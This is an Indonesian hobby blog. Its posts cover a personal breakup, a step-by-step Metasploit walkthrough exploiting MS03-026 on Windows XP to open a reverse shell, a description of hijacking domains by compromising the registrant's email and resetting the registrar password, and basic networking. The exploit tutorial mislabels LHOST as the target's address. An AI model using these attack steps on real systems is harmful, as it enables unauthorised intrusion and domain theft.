Senin, 18 April 2016

Sedikit curhatan saya yang di tinggal pacar.


Assalamualaikum .,. berjumpa lagi dengan saya Thama apa kabarnya nih ?

Iseng-iseng pengen curhat soal pacar saya (yang sekarang jadi mantan) :)

Yaa sebenar nya saya kurang pintar juga dalam mengutarakan isi hati saya, tapi dengan sepenggal paragraf ini, saya harap kalian bisa mengerti apa yang saya maksud :'D

// In every your daydream, i can see the deepest regret in your eyes, tear down all the trust, and suspicion make nervous to come.
something i cant really imagine.
deepest holes.
hard to believe something with lies. //

---- Thama Aritama ----

Sedih juga sih kalau di ingat", terlebih karena saya masih sayang juga.
Yaa mungkin intinya dari awal dia memang tidak serius dengan saya, hanya bermain-main saja :')

Terimakasih Karena Sudah Bersedia Membaca Curhatan saya, walaupun memang tidak begitu jelas karena saya sendiri tidak pandai dalam merangkai kata.
Wasalamualaikum Wr.Wb  

Selasa, 05 November 2013

Exploit and Gain Remote Access to Windows XP (Metasploit)


Before we start hacking, let’s familiarize ourselves with Metasploit so that when I use certain terms, we all understand them to mean the same thing. When first looking at the Metasploit Framework, it can be a bit overwhelming with the various interfaces, options, utilities, and modules. Here we’ll try to make it understandable so that we can execute our first exploit.

Terminology

The following terminology is not only used within the Metasploit Framework, but throughout the professional hacking and penetration testing communities. As a result, any professional in this field should be familiar with these terms and be able to clearly distinguish them.
  • Exploit
Exploit is the means by which an attacker takes advantage of a flaw or vulnerability in a network, application, or service. The hacker uses this flaw or vulnerability in a way that the developer or engineer never intended, to achieve a desired outcome (e.g. root access). Some more common exploits that you’ve probably already heard of are SQL injections, buffer overflows, etc.
  • Payload
A payload is the program or code that is delivered to the victim system. Metasploit has pre-built payloads for this purpose included in the highly useful Meterpreter, or you can develop your own. This payload is designed to provide the attacker with some capability to manage or manipulate the target system for their particular needs.
  • Shellcode
This is a set of instructions used as a payload when the exploitation occurs. Shellcode is typically written in assembly language, but not necessarily always. It’s called “shellcode” because a command shell or other command console is provided to the attacker that can be used to execute commands on the victim’s machine.
  • Module
A module is a piece of software that can be used by the Metasploit Framework. These modules are interchangeable and give Metasploit its unique power. These modules might be exploit modules or auxiliary modules.
  • Listener
This is that component that listens for the connection from the hacker’s system to the target system. The listener simply handles the connection between these systems.
  • Show
Metasploit Framework has hundreds of modules and other utilities. As a result, you will not be able to remember them all. Fortunately, the show command can grab a listing of all modules, options, targets, etc. in your framework.
Now that we have the basics of Metasploit concepts and commands down, let’s hack a system!

Step 1: Getting Started

First, open a terminal in Linux.
One of the most reliable hacks is on the ubiquitous Windows XP system with the RPC DCOM. It’s a buffer overflow attack that enables the attacker to execute any code of their choice on the owned box (note Microsoft’s comment under impact of vulnerability). Microsoft identifies it as MS03-026 in their database of vulnerabilities. In our case, we will use it to open a reverse shell on our target system.

Open the the Metasploit console.
msfconsole
Be patient, it takes awhile for Metasploit to load all of its modules. The current version of Metasploit has 823 exploits and 250 payloads.

Step 2: Find the Exploit

Metasploit allows you to search using the search command. In our case, we are searching for a DCOM exploit, so we can simply type:
msf > search dcom




Step 3: Set the Exploit

Now let’s tell Metasploit what exploit we want to use. Type use and the name of our exploit, exploit/windows/dcerpc/ms03_026_dcom.
msf > use exploit/windows/dcerpc/ms03_026_dcom

Note that the prompt has changed and now reflects our chosen exploit.

Step 4: Set the Options

Now that we’ve chosen our exploit, we can ask Metasploit what our options are. By typing show options, Metasploit will list our options in executing this exploit.
msf > show options


Step 5: Set Remote Host

Metasploit will now ask us for the RHOST. This will be the IP address of the remote host or the machine we’re attacking. In our case, it’s 10.0.0.3. Use the actual IP address of the machine you are attacking. Tools such as nmap can help in identifying the IP address of the machine you are attacking. Notice in the picture above that Metasploit tells us that we will be using (binding) port 135.
msf > set RHOST 10.0.0.3
Step 6: Show Payloads
Next, we check to see what payloads are available for this exploit. Type show payloads at the Metasploit prompt:
msf > show payloads


Step 7: Set Payload

Now that we can see what payloads are available, we can select the generic/shell_reverse_tcp by using the Metasploit console set command. If successful, this will establish a remote shell on the target system that we can command.
msf > set PAYLOAD generic/shell_reverse_tcp


Step 8: Set Local Host

Now that we’ve chosen the exploit and the payload, we need to tell Metasploit the IP address of our attacking machine. In this example, our target system has an IP address of 10.0.0.6. Use the actual IP address of the system you are attacking. Tools such a nmap, can help you obtain IP addresses.
msf > set LHOST 10.0.0.6


Step 9: Exploit

Now we command Metasploit to exploit the system:
msf > exploit

Step 10: Open a Shell on the Hacked System

Type the command sessions –i 1 to open a command shell on the XP system that will appear on your Metasploit console.
sessions –i 1
To confirm that the command shell is on the Windows XP system, type dir to get a directory listing on the Windows XP system that you now own!
C: >dir
Congratulations! You have just hacked your first system using Metasploit!

Jumat, 18 Oktober 2013

Penanganan DNS Hijecking

http://i.imgur.com/DfyDkt5.png
Hallo Betermu lagi dengan saya hehehe... jadi gini mas aq mau jelasin tata cara sholat lima waktu ehh penanganan DNS Hijecking brakakaka... semoga saja aku bisa ya mas :D doain aku mas...

teknik newbie saya ini mungkin bisa membantu buat admin heheheh langsung aja ya mastah
  1. lah apa lagi ya bingung aku emmb.. oh iya set dns nya misal kalau mastah2 di sini nggk punya banyak uang jadi kan terpaksa hosting di hostingan gratis kek idhostinger atau lain sebagainya aku sarankan buat para mastah jangan SET NAME SERVER ! kek ns1.idhostinger.com jangan itu mas hati2 loh :v suer deh cukup saja dengan Host A Record Di Domain Contoh misal ya www.dancok.com harus inget mas itu www :v kalau emang mau bener2 mau sangat ya pasang aja di *.dancok.com nya le ip shared nya nya contoh ya http://i.imgur.com/DfyDkt5.png nah contoh shared ip nya :v hehehe...
  2. mencari hostingan yang benar2 aman dan tentram gan :D kalau bisa beli vps endiri :v
  3. jika pusing dengan tutorial ini silahkan hub dokter hewan atau kimcil :v
nanti aku update video tutorial nya deh :)

Pelajari Tentang DNS Hijacking/Pembajakan Dns

Pembajakan domain merupakan proses di mana Nama Domain Internet dicuri dari pemiliknya yang sah. Pembajakan domain ini

juga dikenal sebagai pencurian/pengambil alihan nama domain oleh pihak yang tidak sah. Sebelum kita dapat melanjutkan untuk mengetahui bagaimana untuk membajak nama domain, perlu memahami bagaimana sebuah nama domain bekerja dan bagaimana mereka berhubungan dengan server web.

Cara Kerja Nama Domain:
situs gohacking.com mengatakan misalnya terdiri dari dua bagian. Nama domain (gohacking.com) dan hosting web server

tempat file server website yang dihosting . Pada kenyataannya, nama domain dan web hosting server (web server) adalah dua bagian yang berbeda dan karenanya mereka harus diintegrasikan sebelum web dapat beroperasi dengan sukses.Integrasi nama domain dengan web server hosting dilakukan sebagai berikut.

1.Setelah mendaftarkan nama domain baru, kita mendapatkan panel kontrol/cpanel. di mana kita dapat memiliki kontrol penuh dari domain.

2.Dari panel kontrol domain ini, ditunjukkan nama domain kita ke web server tempat file-file website disimpan.

Apa yang terjadi ketika sebuah domain yang dibajak?

Untuk membajak sebuah nama domain hanya diperlukan akses ke panel kontrol domain/C-panel dan arahkan nama domain kebeberapa server web lainnya selain yang asli.Jadi untuk membajak sebuah domain Anda tidak perlu mendapatkan akses ke webserver target.

mungkin sebagai contoh saya/anda berhasil mendapatkan hak akses panel kontrol nama domain sebuah perusahaan, maka dengan mudah saya dapat menkonfigurasi modul, dan hal2 lainya dalam website tersebut.
Bagaimana nama domain yang dibajak?

sebenarnya banyak metode & skenario untuk melakukan hal ini, tetapi secara umum saya gambarkan hal-hal yang dibutuhkan adalah sebagai berikut:
1. Target atau nama domain yang anda ingin ennumerasi/eksploitasi
2. Alamat Email yang berhubungan dengan nama domain, yang digunakan untuk registrasi domain

mengenai hal ini anda dapat memanfaatkan web yang memberikan informasih ini seperti domain
http://wwww.domainwhitepages.com atau http://whois.domaintools.com/ dan masih banyak yang lainya”googling mugkin anda bisa menemukan lebih banyak”pada bagian feelbox anda hanya sisa memasukkan nama domain target, lalu klick bottun untuk mengeksekusi…setelah proses scanner dilakukan maka whois record akan menampilkan data2 mengenai halaman target termasuk kontak email administrasi web tersebut

Untuk mendapatkan nama pendaftar domain, cari sesuatu seperti ini di bawah Whois Record. “Registration Service Provided

By: XYZ Company”. “Pendaftaran Layanan yang Disediakan Oleh: XYZ Company”. Here XYZ Company is the domain registrar.

Perusahaan XYZ di sini adalah pendaftar domain. Dalam kasus jika Anda tidak menemukan, kemudian pilih scroll ke atas akan ditunjjukan ICANN Registrar di bawah “Registry Data”. Dalam skenario ini,ICANN registrar adalah pendaftar domain.

Administrasi alamat email yang terkait dengan domain adalah backdoor untuk membajak nama domain. Ini adalah kunci untuk membuka panel kontrol domain.Jadi untuk mengambil kendali penuh dari domain, penyerang akan mekakukan hacking email administrasi yang digunakan Setelah penyerang mengambil kontrol penuh atas account email ini, sipenyerang akan mengunjungi website pendaftar domain dan mengklik lupa password di halaman login.

Di sana ia akan diminta untuk memasukkan salah satu nama domain atau alamat email administratif untuk memulai proses reset password .Setelah selesai semua data untuk me-reset Password akan dikirimkan ke alamat email administrasi.

Karena sipenyerang memiliki hak akses ke account email ini ia dapat dengan mudah me-reset password domain control panel.setelah pengaturan ulang password atau kata sandi, lalu login ke panel kontrol dengan password baru dan dari sana ia dapat membajak domain dalam beberapa menit.
gambar diatas adalah sampel contoh sebuah halaman konfigurasi web/ panel kontrol/C-panel, untuk mengendalikan penuh sebuah halaman website, atau DNS

Kamis, 17 Oktober 2013

Belajar Jaringan Part 8

Pelajar basic kita sudah hampir selesei,

Dari Belajar Jaringan PART VII (basic) yang membahas tentang router sekarang kita akan mengetahui tentang hub dan switch

Sebenarnya fungsinya hampir mirip yaitu menjadi perantara pada suatu jaringan.

Hub 

Suatu perangkat yang memiliki banyak port yang akan menghubungkan beberapa node (komputer) sehingga membentuk suatu jaringan pada topologi star.





Seperti gambar diatas itu hub, saya tidak promosi merk hanya males edit aja

Cara Kerja : Ketika sebuah paket tiba disalah satu port.

Paket itu akan disalin ke port-port yang lain di hub.

Atau dengan kata lain hub hanya menyalin data ke semua simpul yang terhubung ke hub.

Hal ini menyebabkan untuk kerja jaringan akan lambat.

Hub dengan spesifikasi 10/100Mbps harus berbagi bandwidth dengan masing-masing port.

Jadi ketika hanya satu PC yang menggunakan, akan mendapat akses bandwith yang maksimum yang tersedia.

Namun jika beberapa PC beroperasi atau digunakan pada jaringan tersebut, maka bandwidth akan dibagi kepada semua PC, sehingga akan menurukan kinerja jaringan


Switch




Gambar diatas adalah Switch, sekilas mirip tapi switch memiliki beberapa keunggulan dibanding hub.

Cara kerja :


Ada dua arsitektur dasar yang digunakan yaitu : cut-through dan store and forward

Switch cut trough memiliki kelebihan disisi kecepatan karena ketika sebuah paket datang, switch hanya memperhatikan alamat tujuan sebelum diteruskan ke segmen tujuannya.

Sedangkan switch store and forward merupakan kebalikan dari switch cut-trough.

Swtich ini menerima dan menganalisa seluruh isi paket sebelum meneruskannya ketujuan dan untuk memeriksa satu paket memerlukan waktu, tetapi ini memungkinkan switch untuk mengetahui adanya kerusakan pada paket dan mencegahnya agar tidak mengganggu jaringan.

Switch dengan spesifikasi 10/100Mbps akan mengalokasikan 10/100Mbps penuh untuk setiap portnya .

Jadi berapapun jumlah komputer yang terhubung, pengguna akan selalu memiliki bandwidth penuh.

Ok sekian dulu post kali ini kita akan kembali lagi di post Belajar Jaringan Selanjtnya :v

Belajar Jaringan Part 7

Lanjut dari Belajar Jaringan PART VI (basic)

Sekarang kita harus mengetahui tentang Alat yang akan dipergunakan dalam jaringan,

Pertama kita akan memahami tentang Router.


Router adalah komputer khusus yang memiliki tugas utama mengirimkan paket melalui jaringan komputer,

Maksudnya sebagai perantara antara komputer 1 dengan yang lain .

Dalam router ini jalur jaringan ditentukan dan dipilih sehingga paket data terkirim tepat dan akurat

Router mempunyai beberapa komponen yang perlu kita ketahui.

1. CPU (Central Processing Unit) tugasnya menjalankan instruksi system oprasi. seperti menganalisis system, fungsi routing dan fungsi switching.

2. RAM (Random Access Memory) berisi file salinan konfigurasi router, data yang disimpan disini sifatnya tidak permanent akan hilang apabila router direstart

3. ROM (Read-Only Memoory) tugasnya menyimpan diagnosis software yang digunakan ketika router mulai dinyalakan. Menyimpan program bootsrap dari router

4. NVRAM (Non-volatile RAM) Menyimpan semua konfigurasi Router

5. Flash Memory ini adalah IOS router , kalau dikomputer kita biasa melihatnya BIOS

6. Interface ini seperti port ethernet, fast ethernet, console, serial dsb (tergantung router yang kita pakai)

Ok sekian dulu tentang Router , kita berlanjut ke postingan selanjut nya :v
Diberdayakan oleh Blogger.

 

© 2013 I'Learning. All rights resevered. Designed by Templateism

Back To Top